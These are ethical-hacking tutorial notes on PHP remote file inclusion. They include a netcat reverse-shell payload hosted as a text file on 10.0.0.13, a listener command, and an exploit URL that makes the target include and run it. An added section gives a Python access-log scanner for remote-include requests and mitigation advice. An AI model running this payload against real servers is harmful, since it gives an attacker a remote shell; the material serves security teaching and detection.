REMOTE FILE INCLUSION
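Similar to local file inclusion, but it allows an attacker to read ANY file from ANY server.
The attacker can execute PHP files hosted on other servers on the current server.
The PHP files are stored on the other servers as .txt, so the remote server returns the source instead of executing it itself.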
Pre-Condition:
Set allow_url_include to On.
Restart the web service.
Create a local PHP file in /var/www/html.
<?php passthru("nc -e /bin/sh 10.0.0.13 8080"); ?>
Run the nc command to wait for the connection.
nc -vv -l -p 8080
Visit the URL (?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.
We connect to the target machine successfully.
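A defender's view of the request above, as an added example that is not part of the original notes: a Python check that flags access-log entries where a query parameter decodes to a remote URL, the shape of the ?page=http://10.0.0.13/reverse.txt? request. The log lines, the /index.php and /search.php paths and the Combined Log Format layout are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Remote schemes an include can fetch when allow_url_include is On.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request line of a Combined Log Format entry (assumed log layout).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; paths and timestamps are illustrative only.
SAMPLE_LOG = [
    '10.0.0.13 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=http://10.0.0.13/reverse.txt? HTTP/1.1" 200 512',
    '10.0.0.13 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=%2568ttp%3A%2F%2F10.0.0.13%2Freverse.txt%3F HTTP/1.1" 200 512',
    '10.0.0.20 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 2048',
    '10.0.0.20 - - [01/Jan/2024:10:02:00 +0000] "GET /search.php?q=how+to+use+http://+links HTTP/1.1" 200 2048',
]


def decode_fully(value, max_rounds=3):
    """Undo layered percent-encoding, e.g. %2568ttp -> %68ttp -> http."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_params(log_line):
    """Return [(param, decoded_value)] for parameters whose value is a remote URL."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    # parse_qsl splits on & and = first, then decodes each value once.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        if REMOTE_SCHEME.match(value):
            hits.append((name, value))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value in remote_include_params(line):
            print(f"possible RFI: {name}={value}")
```

Parameters that legitimately carry URLs, such as redirect targets, will also match, so triage hits by parameter name and endpoint. Detection complements the fix rather than replacing it: keep allow_url_include Off and map the page parameter to a fixed list of local files.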
Ethical Hacking - Web Penetration Testing(6)